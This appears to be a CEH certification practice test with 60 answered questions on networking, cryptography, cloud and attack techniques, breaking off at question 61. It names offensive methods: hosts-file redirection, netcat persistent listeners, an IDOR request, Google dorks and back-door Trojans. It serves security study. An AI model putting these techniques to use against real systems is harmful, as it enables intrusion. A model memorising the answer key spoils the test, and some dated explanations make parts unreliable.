CEH Practice Test 6
Question 1 of 100
Phishing, pop-ups, and IRC channel use are all examples of which type of social engineering attack?
Correct Answer:
Computer based is correct.
Computer-based social engineering attacks include any measures using computers and technology.
Incorrect Answers:
Human based, Technical, and Vishing are incorrect.
Human-based social engineering uses interaction in conversation or other circumstances between people to gather useful information.
There is no such thing as a “technical” social engineering attack.
Using a phone during a social engineering effort is known as “vishing” (for “voice phishing”).
Question 2 of 100
Which flags are set in the segment during the second step of the TCP three-way handshake?
Correct Answer:
SYN-ACK is correct.
A three-way TCP handshake has the originator forward a SYN. The recipient, in step 2, sends a SYN and an ACK. In step 3, the originator responds with an ACK.
Incorrect Answers:
SYN, ACK, and ACK-FIN are incorrect.
The steps are referred to as SYN, SYN-ACK, and ACK.
Question 3 of 100
You are monitoring the activities of your pen test team and notice one member opening Airsnarf. What is he trying to accomplish?
Correct Answer:
He is trying to sniff passwords and user IDs is correct.
Airsnarf does a great job of sniffing passwords and authentication traffic.
Incorrect Answers:
He is trying to locate rogue access points on the network, He is verifying signal strength from access points in the network, and He is attempting a denial-of-service attack on the access point are incorrect.
Airsnarf does not locate rogue APs, nor does it monitor signal strength.
Also, Airsnarf does not attempt DoS attacks.
Question 4 of 100
Your customer is concerned about weak passwords in the environment and asks you to specifically test for them. Which of the following are you least likely to do?
Correct Answer:
Announce to the users when you will begin testing is correct. If the goal is to see if there are weak passwords being used in the environment on an average day, why in the world would you make it an uncommon day by telling people to change their passwords right before you start testing?
Incorrect Answers:
All other answers are incorrect. Each of those actions makes perfect sense for an ethical hacker who has been asked to test and report on weak passwords.
Question 5 of 100
An attacker gains access to a Windows machine and wants to redirect users' requests for certain websites to IP addresses he maintains. Which of the following files should he edit?
Correct Answer:
hosts is correct. A Windows system goes through the same process for every name-to-IP resolution. First, it checks its own cache to see if the requested name has already been looked up. Next, it checks the hosts file. The hosts file is a plain-text file that is used to manually map names to IP addresses. If an attacker were to gain access to the hosts file, he could add any name-to-IP mapping he wanted, ensuring the victim wouldn’t even recognize a problem was occurring.
Incorrect Answers:
The passwd file holds passwords in Linux systems.
The lmhosts file maps IP addresses to NetBIOS names, much like the hosts file does for DNS names.
The SAM file holds the local password hashes on a Windows system.
Question 6 of 100
Which of the following copies into the system32 folder on Windows machines and creates a back door?
Correct Answer:
Poison Ivy is correct. Poison Ivy provides a full remote-control back door on infected systems and copies itself directly into /system32.
Incorrect Answers:
SubRoot, from 2009, creates a full-control back door over port 1700 (TCP).
Restorator is a defacement Trojan.
Biodox is a GUI full remote-control Trojan.
Question 7 of 100
Which nmap script can be used to show potentially risky HTTP methods?
Correct Answer:
http-methods is correct. Per nmap’s website (https://nmap.org), the http-methods script “finds out what options are supported by an HTTP server by sending an OPTIONS request and lists potentially risky methods. Any output other than 501/405 suggests that the method is if not in the range 400 to 600. If the response falls under that range then it is compared to the response from a randomly generated method. In this script, ‘potentially risky’ methods are anything except GET, HEAD, POST, and OPTIONS.”
Incorrect Answers:
All other answers are incorrect. These are not valid nmap scripts.
Question 8 of 100
The < character opens an HTML tag, and the > character closes it. In some web forms, input validation may deny these characters to protect against XSS. Which of the following represent the HTML entities used in place of these characters? (Choose two.)
Correct Answer:
&lt; and &gt; are correct.
Whether attempting to bypass input validation or just having things appear the way you want them to on a web page, HTML entities can be useful. The less-than sign (<) equates to &lt;, and the greater-than sign (>) equates to &gt;. You can also use their respective numbered equivalents (&#60; and &#62;).
Incorrect Answers:
&amp;, &reg;, and &nbsp; are incorrect.
&amp; equates to the ampersand (&), &reg; equates to the registered symbol (®), and &nbsp; is a nonbreaking space.
Question 9 of 100
You implement a firewall on the edge of your private network. Which of the following best describes this control effort?
Correct Answer:
Technical preventive control is correct. A firewall is a technical control and is preventive in nature. Controls are generally preventive, corrective, or detective in nature; however, they may also be labeled as directive, deterrent, or compensating.
Incorrect Answers:
All other answers are incorrect. A firewall is neither a physical control nor detective or corrective.
Question 10 of 100
Which of the following cipher types transforms a fixed-length block of plain text into cipher text of the same length?
Correct Answer:
Block is correct. Block ciphers symmetrically encrypt fixed-length portions of plain text.
Incorrect Answers:
Stream ciphers encrypt bit by bit.
Bit and hash are invalid answers for this question.
Question 11 of 100
What does no response from a port during an XMAS scan indicate?
Correct Answer:
The port is open is correct.
No response from a port during an XMAS scan indicates it is open. If a RST packet is received, the port is considered closed, while no response means it is open (or possibly filtered). The port is marked filtered if an ICMP unreachable error (Type 3, Code 0, 1, 2, 3, 9, 10, or 13) is received.
Incorrect Answers:
The port is closed, The scan has failed to reach the target, and None of the above are incorrect.
A RST/ACK would indicate a closed port.
No response does not necessarily indicate the target has not been reached.
Question 12 of 100
As your IDLE scan moves along, you notice that fragment identification numbers gleaned from the zombie machine are incrementing randomly. What does this mean?
Correct Answer:
Your IDLE scan results will not be useful to you is correct.
It is absolutely essential the zombie remain idle to all other traffic during an IDLE scan. The attacker will send packets to the target with the (spoofed) source address of the zombie. If the port is open, the target will respond to the SYN packet with a SYN/ACK, but this will be sent to the zombie. The zombie system will then craft a RST packet in answer to the unsolicited SYN/ACK, and the IPID will increase. If this occurs randomly, then it’s probable your zombie is not, in fact, idle, and your results are moot.
Incorrect Answers:
The zombie system is a honeypot, There is a misbehaving firewall between you and the zombie machine, and This is an expected result during an IDLE scan are incorrect.
There is not enough information here to identify the zombie machine as anything at all—much less a machine set up as a honeypot—and a firewall has nothing to do with any of this. This is also not expected behavior during an IDLE scan.
Question 13 of 100
Within a PKI, which of the following verifies the applicant?
Correct Answer:
Registration authority is correct.
A registration authority (RA) validates an applicant into the system, making sure they are real, valid, and allowed to use the system. RAs are also known as “subordinate CAs.”
Incorrect Answers:
CRL, Revocation authority, and Primary authority are incorrect.
The CRL (Certificate Revocation List) is used to track which certificates have problems and which have been revoked. The remaining terms are not legitimate.
Question 14 of 100
Which of the following tools silently copies all files from a USB when it is connected to the system?
Correct Answer:
USB Dumper is correct. USB Dumper silently copies the files and folders from the flash drive when it is connected to the PC.
Incorrect Answers:
Snoopy is a sniffer for Windows.
HackRF One is used in rolling code attacks.
KeyLLama is a keylogger.
Question 15 of 100
X.509 defines the standard for digital certificates. Per this standard, which of the following are fields within a certificate? (Choose all that apply.)
Correct Answers:
Version, algorithm ID, public key, and key usage are correct. X.509 is an ITU-T standard defining all sorts of things regarding PKI, including the digital certificate and what it holds. It identifies several components of a digital certificate, including the version, the algorithm ID, a copy of the public key, and the key usage description.
Incorrect Answers:
The private key is never shared.
A PTR record is a DNS record type, not a component of a digital signature.
Question 16 of 100
OWASP releases several Top Ten lists. On their top security priorities, one entry includes flaws that allow attackers to compromise passwords, encryption keys, and session tokens. Which of the following matches this description best?
Correct Answer:
Broken Authentication is correct. I admit it—this one is really, really picky. Broken Authentication is second on the list of security priorities in OWASP’s 2017 list, and best matches the question parameters. The following is taken directly from the list: “Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities.”
Incorrect Answers:
The site states the following on Injection (#1): “Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.”
The site states the following about Insecure Direct Object References (#4): “A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.”
And, finally, the website has this to say about Security Misconfiguration (#5): “Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date.”
Question 17 of 100
Which of the following describes the risk that remains after the vulnerabilities are classified and the countermeasures have been deployed?
Correct Answer:
Residual risk is correct.
Residual risk is exactly what it sounds like—risk that remains after the application of security controls.
Incorrect Answers:
Evaluated risk, Inherent risk, and Deferred risk are incorrect.
Evaluated risk doesn’t exist (at least as a vulnerability management term for your studies). Inherent risk is the actual risk itself before the application of any controls. Deferred risk is another pretty straightforward term: risk that is deferred to a later time.
Question 18 of 100
18. Question
Which of the following is the best way to defend against network sniffing?
Correct answer:
Implement encryption throughout the environment is correct. Encryption is the enemy of sniffing (and IDS). After all, if it’s encrypted at point A and decrypted only at point B, any effort to examine it in between is pointless. Of the choices, this is the best available option.
Incorrect answers:
All other answers are incorrect. Physical security and static IP addressing won’t do a thing about sniffing. MAC access control can provide some protection, but not at the level encryption could.
Question 19 of 100
19. Question
Your new employee is pen testing a fully switched subnet and wants to know how to proceed. Which of the following methods might be useful for sniffing traffic in this situation? (Choose all that apply.)
Correct answers:
ARP spoofing, span port, and MAC flooding are correct. Spoofing ARP messages can trick the switch into sending traffic your way, and MAC flooding turns the switch into a hub. Spanning a port requires access to the switch IOS itself but would provide access to traffic.
Incorrect answer:
Port security would frustrate your efforts to sniff traffic.
Question 20 of 100
20. Question
Which of the following statements is true regarding the use of a proxy server on your network?
Correct answer:
Proxy servers can filter Internet traffic for internal hosts is correct. Proxy servers stand in the stead of internal hosts. You can have them go out of the network and do all the dirty work for you, or you can have them “host” services for you. Providing controlled access to Internet traffic with a proxy is an excellent example—browsers point to a proxy that then handles the work of grabbing and returning requested data.
Incorrect answers:
All other answers are incorrect.
IDS monitors traffic, and DHCP servers automate addressing. A web server would be used to host a website, not a proxy.
Question 21 of 100
21. Question
Which of the following IoT communication models adds a collective entity before sending data to the cloud?
Correct answer:
Device to gateway is correct. An IoT gateway is a device designed to send collected data from IoT devices to the user or to data storage (the cloud) for use later. Implementing this model may allow for the application of additional security controls.
Incorrect answers:
Device to device is exactly what it sounds like.
Back-end data sharing adds third-party access to your data on the cloud side.
Device to thing does not exist.
Question 22 of 100
22. Question
Which one of the following DoS categories goes after load balancers, firewalls, and application servers by attacking connection state tables?
Correct answer:
TCP state-exhaustion attacks is correct. These attacks go after load balancers, firewalls, and application servers by attempting to consume their connection state tables.
Incorrect answers:
Volumetric attacks, also known as bandwidth attacks, consume all available bandwidth for the system or service.
Application attacks consume resources necessary for the application to run, effectively making it unavailable to others.
Fragmentation attacks take advantage of the system’s ability (or lack thereof) to reconstruct fragmented packets.
Question 23 of 100
23. Question
Which of the following may be useful in mitigation against phishing? (Choose all that apply.)
Correct answers:
Netcraft Toolbar and PhishTank Toolbar are correct. Although nothing is foolproof, a couple of options can assist in protecting against phishing. The Netcraft Toolbar and the PhishTank Toolbar can help in identifying risky sites and phishing behavior.
Incorrect answers:
All other answers are incorrect.
IDSs are great to have, and can help in identifying the effects after social engineering has succeeded, but they do nothing to prevent phishing.
Question 24 of 100
24. Question
You want to peruse metadata from publicly available documents to learn more about your target. Which of the following tools can help with this?
Correct answer:
Metagoofil is correct. Metagoofil is an information-gathering tool designed for extracting metadata of public documents (.pdf, .doc, .xls, .ppt, .docx, .pptx, and .xlsx) belonging to a target company. Metagoofil will perform a search in Google to identify and download the documents to local disk and then will extract the metadata with different libraries such as Hachoir, PdfMiner, and others. With the results, it will generate a report with usernames, software versions, and server or machine names that will help penetration testers in the information-gathering phase.
Incorrect answers:
All other answers are incorrect. None of the remaining tools performs this task.
Question 25 of 100
25. Question
Which of the following is a command-line sniffer and packet analyzer?
Correct answer:
Tcpdump is correct. Tcpdump is a well-known sniffer that has been around forever. GUI-based sniffers—like Wireshark—are all the rage, but tcpdump has survived the test of time and still has a place in your toolset.
Incorrect answers:
Nessus is a vulnerability scanner.
Netstat will display port information on your system.
Netcat is used for maintaining access on a system (along with other things).
Question 26 of 100
26. Question
An attacker gains access to an internal machine. He then uses Metasploit to access and attack other internal systems from that machine. Which of the following terms describes this?
Correct answer:
Pivoting is correct. Pivoting involves using a compromised system as a launching point into other systems. After the first system is owned, the attacker can add a route statement in Metasploit to access the network beyond it.
Incorrect answers:
Fuzzing refers to a testing scenario aimed at applications (using random data).
Patching refers to applying released security updates.
Switching is not a term used in this area.
Question 27 of 100
27. Question
Which of the following is an attempt to resolve computer security problems through hardware enhancements and associated software modifications?
Correct answer:
Trusted computing module is correct. Trusted computing basically refers to an attempt to resolve computer security problems through hardware enhancements and associated software modifications. Roots of Trust (RoT) is a set of functions within the trusted computing module that are always trusted by the computer’s operating system.
Incorrect answers:
The Trusted Computing Group (TCG) is made up of a bunch of hardware and software providers who cooperate to come up with specific plans.
Cloud computing is irrelevant.
OSRoT is not a legitimate term.
Question 28 of 100
28. Question
Which firewall operates at Layer 5?
Correct answer:
Circuit level is correct. It’s true that circuit-level firewalls can and do monitor TCP handshakes (Layer 4) and that they can monitor and filter on upper-layer protocols (Application layer), but they don’t make filtering decisions based on the data within those protocols. They primarily work at the Session layer (Layer 5).
Incorrect answers:
Application-level firewalls work at Layer 7.
Packet-filtering and stateful firewalls work at Layers 3 and 4, respectively.
Question 29 of 100
29. Question
Which of the following is NOT a recommended practice for malware analysis?
Correct Answer:
After static analysis, run the virus in a sparsely used portion of the network is correct.
Running a virus on your production network is dumb, dumb, dumb. When performing malware analysis, first prepare a test bed—usually a system with VMs, all shared drives disabled, and the NIC in host-only mode. After copying the virus to the test system, perform static analysis while the malware is inactive. Next, set up network connections (off production network, of course) and monitor for errors/activity. Finally, run the malware and note the processes, files added, and network activity.
Incorrect Answers:
When preparing the test bed system, disable all shared drives, B, and C are incorrect.
These are all valid steps in malware analysis.
Question 30 of 100
30. Question
Which cloud service type offers on-demand applications to subscribers over the Internet?
Correct Answer:
SaaS is correct.
Software as a Service (SaaS) is simply a software distribution model—the provider offers on-demand applications to subscribers over the Internet.
Incorrect Answers:
IaaS, PaaS, and Hypervisor are incorrect.
Infrastructure as a Service (IaaS) basically provides virtualized computing resources over the Internet.
Platform as a Service (PaaS) is geared toward software development because it provides a development platform that allows subscribers to develop applications without building the infrastructure it would normally take to develop and launch software.
Hypervisor is a term associated with the provision of virtual machines (examples include VMware, Oracle VirtualBox, Xen, and KVM).
Question 31 of 100
31. Question
Which of the following statements is true regarding NetStumbler?
Correct answer:
NetStumbler can be installed on Windows is correct. NetStumbler is a Windows tool. It can detect wireless traffic on 802.11a, b, and g networks but not on 802.11n networks.
Incorrect answers:
All other answers are incorrect. NetStumbler can’t be installed on anything but Windows. Additionally, it doesn’t support monitor mode (used in passive scanning).
Question 32 of 100
32. Question
Which cloud service type is best designed for software development?
Correct answer:
PaaS is correct. Platform as a Service (PaaS) is geared toward software development because it provides a development platform that allows subscribers to develop applications without building the infrastructure it would normally take to develop and launch software. Hardware and software are hosted by the provider on its own infrastructure so customers do not have to install or build homegrown hardware and software for development work. PaaS doesn’t usually replace an organization’s actual infrastructure; instead, it just offers key services the organization may not have onsite.
Incorrect answers:
Infrastructure as a Service (IaaS) basically provides virtualized computing resources over the Internet.
Software as a Service (SaaS) is simply a software distribution model—the provider offers on-demand applications to subscribers over the Internet.
Hypervisor is a term associated with the provisioning of virtual machines (examples include VMware, Oracle VirtualBox, Xen, and KVM).
Question 33 of 100
33. Question
A hacker performs attacks because of political motivation. Which term best describes this attacker?
Correct Answer:
Hacktivist is correct.
Hackers who use their skills and talents to forward a cause or a political agenda are practicing hacktivism.
Incorrect Answers:
Script kiddie, State-sponsored hacker, and Suicide hacker are incorrect.
Script kiddies generally just copy attack codes and don’t really have much in the way of a skill set.
State-sponsored hacking is exactly what it sounds like, and a suicide hacker may indeed be a hacktivist, but he doesn’t care about being caught (unless the question specifies this; don’t assume it).
Question 34 of 100
34. Question
An attacker crafts an e-mail with a link to a malicious site. He sends this e-mail to a select group of people inside the organization who would be familiar with the contents and suggestions within the e-mail. Which of the following best describes this attack?
Correct answer:
Spear phishing is correct. Spear phishing involves a little reconnaissance to define a group of folks inside an organization.
Incorrect answers:
Phishing is definitely the attack being used, but targeting the attack against a specific group makes it spear phishing.
The remaining answers do not apply here.
Question 35 of 100
35. Question
A pen tester gains access to a Windows application server and enters the following command: `netsh firewall show config`. What should be displayed in return?
Correct Answer:
Settings of the built-in firewall is correct.
The netsh command can show all sorts of goodies. In this example, it is used to display the Windows firewall settings.
Incorrect Answers:
An authentication screen for firewall configuration access, Route mapping to the nearest firewall, and D are incorrect.
The remaining answers do not accurately reflect the command.
Question 36 of 100
36. Question
An attacker sees guard dogs inside the perimeter. Which of the following best describes this control effort?
Correct answer:
Physical deterrent control is correct. What can deter you more than the sight of a dog patrolling an area, just waiting for an intruder to chew on? Note the terminology here, though: “preventive” could just as easily have been used as a descriptor; however, “deterrent” is usually found with the physical descriptor.
Incorrect answers:
All other answers are incorrect. Dogs aren’t technical—even smart ones. And while you can use a bloodhound as a means to track down an escapee, dogs are not detective controls.
Question 37 of 100
37. Question
Bill is asked to perform an assessment but is provided with no knowledge of the system other than the name of the organization. Which of the following best describes the test he will be performing?
Correct answer:
Black box is correct. While there may be some argument about the real-world version of a black-box test, as far as your exam goes, it is an assessment without any knowledge provided about the target.
Incorrect answers:
White-box and gray-box tests both provide information about the target (white is all of it; gray is some of it).
Question 38 of 100
38. Question
You are offering your team’s pen test services to a potential client. The customer reviews things and seems unconvinced a manual pen test will be helpful in securing their systems. Which of the following should you do as an ethical hacker and representative of your team?
Correct answer:
“Bring statistical information to the table, showing the risks of poor network security as well as the use of pen testing by industry and government agencies alike” is correct. Ethically, this is the only choice that makes any sense. You can’t do anything without an agreement in place first, and it’s your job to convince the potential client they need it.
Incorrect answers:
All other answers are incorrect. Each of these answers—although funny and providing some satisfaction for the “See, I told you so!” crowd among us—is highly unethical.
Question 39 of 100
39. Question
What is the primary difference between S/MIME and PGP?
Correct Answer:
“PGP can be used to encrypt hard drives, but S/MIME cannot” is correct.
Pretty Good Privacy (PGP) can handle a lot more than e-mail, and that is one of the primary differences between it and S/MIME (Secure/Multipurpose Internet Mail Extensions). PGP is an application, whereas S/MIME is a protocol.
Incorrect Answers:
“PGP uses SHA-1 for integrity,” “S/MIME can encrypt e-mail, but PGP can’t,” and “S/MIME uses RSA for digital signatures” are incorrect.
The remaining choices are not true regarding either PGP or S/MIME.
Question 40 of 100
40. Question
An employee’s cell phone begins receiving unsolicited messages. Which Bluetooth attack is being exploited?
Correct answer:
Bluejacking is correct. Bluejacking is a Bluetooth attack where the attacker sends unsolicited messages to the target.
Incorrect answers:
Bluesmacking is a DoS attack.
Bluesniffing is an effort to sniff data from Bluetooth exchanges.
Bluesnarfing is the actual theft of data from a Bluetooth device.
Question 41 of 100
41. Question
What is the MAC address in broadcast frames?
Correct Answer:
FF:FF:FF:FF:FF:FF is correct.
The MAC address for broadcast frames is made up of all Fs.
Incorrect Answers:
AA:AA:AA:AA:AA:AA, 11:11:11:11:11:11, and 99:99:99:99:99:99 are incorrect.
None of the remaining MAC addresses fits the question.
Question 42 of 100
42. Question
Which virus type overwrites otherwise empty areas within a file?
Correct answer:
Cavity is correct. One thing all malware writers attempt to do is find ways to hide their work. By finding empty spaces in a file and writing to them, a cavity virus can infect a file and not change its size so far as the system is concerned.
Incorrect answers:
Polymorphic viruses try mutating themselves to avoid detection.
Macro viruses use macros built into various programs (such as Microsoft Excel).
A boot sector virus is exceedingly difficult to get rid of and, obviously, installs on the boot sector of the disk.
Question 43 of 100
43. Question
Internet attackers—state-sponsored or otherwise—often discover vulnerabilities in a service or product but keep the information quiet and to themselves, thus ensuring the vendor is unaware of the vulnerability until the attackers are ready to launch an exploit. Which of the following best describes this?
Correct Answer:
Zero-day attack is correct.
A zero-day attack is one carried out on a vulnerability the good guys didn’t even know existed. The true horror of such attacks is that you do not know about the vulnerability until it’s far too late.
Incorrect Answers:
“Zero-hour attack,” “No-day attack,” and “Nada-sum attack” are incorrect.
The remaining answers are not legitimate terms.
Question 44 of 100
44. Question
In a discussion about biometric authentication systems, you mention a circumstance where legitimate users are denied access because of a system error or inaccurate readings. What is the correct term for this circumstance?
Correct answer:
False negative is correct. A false negative occurs when a user is denied access even though he is a legitimate user.
Incorrect answers:
A false positive occurs when a user is allowed access when he is not legitimate.
False acceptance rate and crossover error rate are both measurements of the overall accuracy of biometrics.
Question 45 of 100
45. Question
A colleague enters the following into a Google search string: `intitle:intranet inurl:intranet +intext:"finance"`. Which of the following statements is most correct concerning this attempt?
Correct answer:
“The search engine will respond with only those pages having the word ‘intranet’ in the title and URL and with ‘finance’ in the text” is correct. Google search operators can be combined to get really sneaky. In this example, we’re looking for an internal page (“intranet” in title and URL) possibly containing finance data.
Incorrect answers:
All other answers are incorrect. Google hack operators can be combined. The search string does not say to look for “finance” in the URL; rather, it specifically states that this should be looked for in the text of the page, and there is more to the search string than just “intranet” in the URL and title.
Question 46 of 100
46. Question
Which of the following tools can be used in IPSec VPN scanning and fingerprinting?
Correct answer:
IKE-scan is correct. IKE-scan is an IPSec VPN scanning, fingerprinting, and testing tool.
Incorrect answers:
Wireshark is used for packet capture and sniffing.
Nikto and Black Widow are both involved in web server examination and testing.
ARPwatch is not applicable here.
Question 47 of 100
47. Question
Angie waits by a side door and follows a group of employees inside. She has no visible badge of any kind. Which of the following best describes this action?
Correct answer:
Piggybacking is correct. If the attacker is not carrying a badge—real or fake—the correct definition is piggybacking.
Incorrect answers:
Tailgating involves the use of a badge (real or fake) when following employees in through an open door.
Surfing and reverse SE have nothing to do with this topic.
Question 48 of 100
48. Question
Ethical hacker Brad is testing insecure direct object reference. He attempts to gain account access to resources under a username he discovered called Joe. Which of the following best demonstrates an attempt to exploit the insecure direct object reference?
Correct answer:
`GET /restricted/accounts/?name=Joe HTTP/1.1 Host: somebank.com` is correct. Of the choices provided, this is the only one that attempts direct access to Joe’s account. The following is from OWASP’s page on the subject: “Applications frequently use the actual name or key of an object when generating web pages. Applications don’t always verify the user is authorized for the target object. This results in an insecure direct object reference flaw.” An attacker, who is an authorized system user, simply changes a parameter value that directly refers to a system object to another object the user isn’t authorized for.
Incorrect answers:
All other answers are incorrect. These attempts do not attempt direct access to Joe’s account.
Question 49 of 100
49. Question
Which of the following provides a means to discover an organization’s restricted URLs and possibly OS information from selected targets?
Correct answer:
netcraft is correct. Netcraft has been around for a while and is highlighted repeatedly by ECC. It can be used to discover restricted URLs and to fingerprint OS information.
Incorrect answers:
Neither nmap nor whois provides the means to discover restricted URLs.
Facebook is absurd as a response.
Question 50 of 100
50. Question
A user is signed into his bank’s website and is reviewing his online banking accounts. While the browser session is open, he receives an e-mail containing a link to a news story. He clicks the link and, after reading the story, closes the browser. Within a couple of hours his bank contacts him to verify a transfer of funds from his account. Which of the following attacks most likely occurred?
Correct answer:
CSRF is correct. OWASP defines CSRF (cross-site request forgery) as a type of attack that occurs when a malicious website, e-mail, blog, instant message, or program causes a user’s web browser to perform an unwanted action on a trusted site for which the user is currently authenticated. The idea is simple, and the results are extraordinarily evil: take over an already-authenticated web session and have the victim’s browser send messages for you.
Incorrect answers:
All other answers are incorrect. These attacks do not match the scenario given.
Question 51 of 100
51. Question
Which of the following is a controlled buffer network between the organization’s internal network and the Internet?
Correct answer:
DMZ is correct. DMZ (for demilitarized zone) comes from the military and refers to a section of land between two adversarial parties where there are no weapons and fighting. The idea is you can see an adversary coming across the DMZ and have time to work up a defense. In networking, the idea is the same: it’s a controlled, buffer network between you and the uncontrolled chaos of the Internet.
Incorrect answers:
The production zone is a very restricted zone that strictly controls direct access from uncontrolled zones and does not hold users.
The intranet is your internal network—a controlled zone that has little-to-no heavy restrictions, since everything is internal.
The management network zone is usually an area you’d find rife with VLANs and maybe controlled via IPSec and such. This is a highly secured zone with very strict policies.
Question 52 of 100
52. Question
An attacker is setting up a netcat listener on a Windows system and wants it to stay in persistent mode. Which of the following commands does this?
Correct answer:
-L is correct. The uppercase L not only puts the port into listening mode but tells it to stay persistent (if the client kills the connection for any reason, it will remain in a listening state).
Incorrect answers:
-l, -e, and -n are incorrect. The -l option opens the port as a listening port but does not keep it persistent. The -e and -n options (-e defines a program to execute, and -n prohibits DNS lookups) don’t apply.
Question 53 of 100
53. Question
Which nmap script helps with detection of HTTP GET, POST, HEAD, PUT, DELETE, and TRACE methods?
Correct answer:
http-methods is correct. The following is from nmap.org regarding the script: “Finds out what options are supported by an HTTP server by sending an OPTIONS request. Lists potentially risky methods. It tests those methods not mentioned in the OPTIONS headers individually and sees if they are implemented. Any output other than 501/405 suggests that the method is not in the range 400 to 600…. In this script, ‘potentially risky’ methods are anything except GET, HEAD, POST, and OPTIONS. If the script reports potentially risky methods, they may not all be security risks, but you should check to make sure.”
Incorrect answers:
All other answers are incorrect. These are not scripts in nmap to show HTTP methods.
Question 54 of 100
54. Question
Traceroute works by stopping at each hop on the way to the destination and providing information to the sender about that hop. How does traceroute manipulate the TTL of the packet to accomplish this?
Correct
Correct answer:
The TTL is incremented by 1 for each hop discovered is correct. Traceroute starts by setting the TTL to 1. At the first hop, the return packet provides information about that stop along the way. Traceroute then sends the next packet with TTL set to 2, ensuring it will receive information about the hop just after the one it has already discovered. This is repeated until the destination is reached.
Incorrect answers:
All other answers are incorrect. These are not accurate statements regarding traceroute.
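The TTL mechanism described above, modelled in Python as an added example that is not part of the original page. No packets are sent: the routers, addresses and the silent second hop are constructed, and each "router" just applies the IPv4 forwarding rule (decrement the TTL, drop the packet and send ICMP Time Exceeded when it hits zero), while the destination answers a UDP probe with ICMP Port Unreachable.

```python
"""Model of the TTL trick traceroute relies on (added example, not part of the
original page). The topology below is constructed; no real packets are sent."""

from dataclasses import dataclass
from typing import Optional

ICMP_TIME_EXCEEDED = 11   # type 11: TTL expired in transit
ICMP_DEST_UNREACH = 3     # type 3, code 3: UDP probe reached the host, port closed


@dataclass
class Router:
    addr: str
    sends_time_exceeded: bool = True   # hops that filter/rate-limit ICMP show as "*"


@dataclass
class Path:
    routers: list
    dest: str


@dataclass
class Reply:
    src: str
    icmp_type: int


def forward_probe(path: Path, ttl: int) -> Optional[Reply]:
    """Send one UDP probe with the given TTL along the path and return the
    ICMP reply, or None when the hop that expired it stays silent."""
    for router in path.routers:
        ttl -= 1                      # every router decrements TTL before forwarding
        if ttl == 0:                  # expired here: drop and report back to the sender
            if router.sends_time_exceeded:
                return Reply(router.addr, ICMP_TIME_EXCEEDED)
            return None
    # TTL survived every router: the destination host answers the UDP probe
    # (aimed at a closed high port) with ICMP port unreachable.
    return Reply(path.dest, ICMP_DEST_UNREACH)


def traceroute(path: Path, max_hops: int = 30) -> list:
    """Raise the TTL by one per round until the destination itself replies."""
    hops = []
    for ttl in range(1, max_hops + 1):
        reply = forward_probe(path, ttl)
        if reply is None:
            hops.append((ttl, "*"))          # printed as "*" by real traceroute
            continue
        hops.append((ttl, reply.src))
        if reply.icmp_type == ICMP_DEST_UNREACH:
            break                            # reached the target, stop incrementing
    return hops


# Constructed topology for the demo: three routers, the middle one silent.
DEMO_PATH = Path(
    routers=[Router("10.0.0.1"),
             Router("192.0.2.9", sends_time_exceeded=False),
             Router("198.51.100.2")],
    dest="203.0.113.7",
)

if __name__ == "__main__":
    for ttl, who in traceroute(DEMO_PATH):
        print(f"{ttl:2d}  {who}")
```

Running it prints four lines: the first router, an asterisk for the hop that never answers, the third router, then the destination, which is exactly the pattern a real traceroute shows when an intermediate device drops ICMP.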
Question 55 of 100
55. Question
Which of the following is the best choice for protection against privilege escalation vulnerabilities?
Correct answer:
Ensuring services run with least privilege is correct. Running each service under an account with only the rights it needs (rather than running everything as admin or root) limits what an attacker gains by compromising that service, so an exploit against it does not hand over administrative control directly.
Incorrect answers:
Keeping drivers patched is good practice (vulnerable kernel drivers are one escalation path), but it addresses a single vector rather than the broad exposure the question is asking about.
Admin accounts don't run with least privilege; they're admin accounts for a reason.
Automating services may save time but does nothing to slow down an attacker.
Question 56 of 100
56. Question
You are discussing methods to evade IDS detection with your team. One team member suggests sending large amounts of traffic to the IDS in an effort to hide the true attack traffic. Which of the following best describes this effort?
Correct answer:
False-positive generation is correct. Flooding the sensor with traffic that trips its signatures can provide "cover fire" for the real attack, because analysts have to dig the true alert out of a mass of noise. The flood itself signals that something is going on, so this is not stealthy, but the idea is valid.
Incorrect answers:
All other answers are incorrect. Session splicing (spreading an attack across many small segments), source routing, and address spoofing are evasion techniques in their own right, but none of them relies on generating large amounts of traffic.
Question 57 of 100
57. Question
Which of the following jailbreaking techniques will leave the phone in a jailbroken state even after a reboot?
Correct answer:
Untethered is correct. An untethered jailbreak persists across reboots: the device comes back up jailbroken on its own, with no connection to a computer required.
Incorrect answers:
With a tethered jailbreak, a reboot removes the jailbreak patches, and the phone may get stuck in a boot loop until it is connected to a computer (USB) and jailbroken again.
With a semi-tethered jailbreak, a reboot also discards the patched kernel, but the device still boots normally and the jailbreak software stays installed, so the jailbreak can be reapplied from the device itself when elevated privileges are needed again.
Rooted is a distractor; rooting is the Android term for gaining superuser access and says nothing about reboot behavior.
Question 58 of 100
58. Question
Which of the following is a software application used to asymmetrically encrypt and digitally sign e-mail?
Correct answer:
PGP is correct. Pretty Good Privacy is used for signing, compressing, and encrypting and decrypting e-mail, files, directories, and even whole disk partitions, mainly to secure e-mail communications. It is a hybrid system: the message is encrypted with a one-time symmetric session key, that key is encrypted with the recipient's public key, and the signature is made with the sender's private key.
Incorrect answers:
All other answers are incorrect. The remaining answers have nothing to do with e-mail encryption.
Question 59 of 100
59. Question
Which of the following tools provides instant visibility and continuous protection for servers in any combination of data centers, private clouds, and public clouds?
Correct answer:
CloudPassage Halo is correct. CloudPassage Halo "provides instant visibility and continuous protection for servers in any combination of data centers, private clouds, and public clouds."
Incorrect answers:
Metasploit is an exploitation framework, not a server-protection product.
AWSExploit is not a legitimate tool.
CloudInspect was designed for AWS cloud subscribers and runs as an automated, all-in-one penetration testing suite for that cloud subscription.
Question 60 of 100
60. Question
You are performing recon on a target and want to see if they keep their employee listing available on their website. Which of the following would search for a page called “employees” on the target.com site?
Correct answer:
intitle:"employees" site:target.com is correct. The intitle: operator tells Google to return pages that have "employees" in their title, and the site: operator restricts the results to pages on target.com.
Incorrect answers:
All other answers are incorrect. These use invalid operator syntax.
Question 61 of 100
61. Question
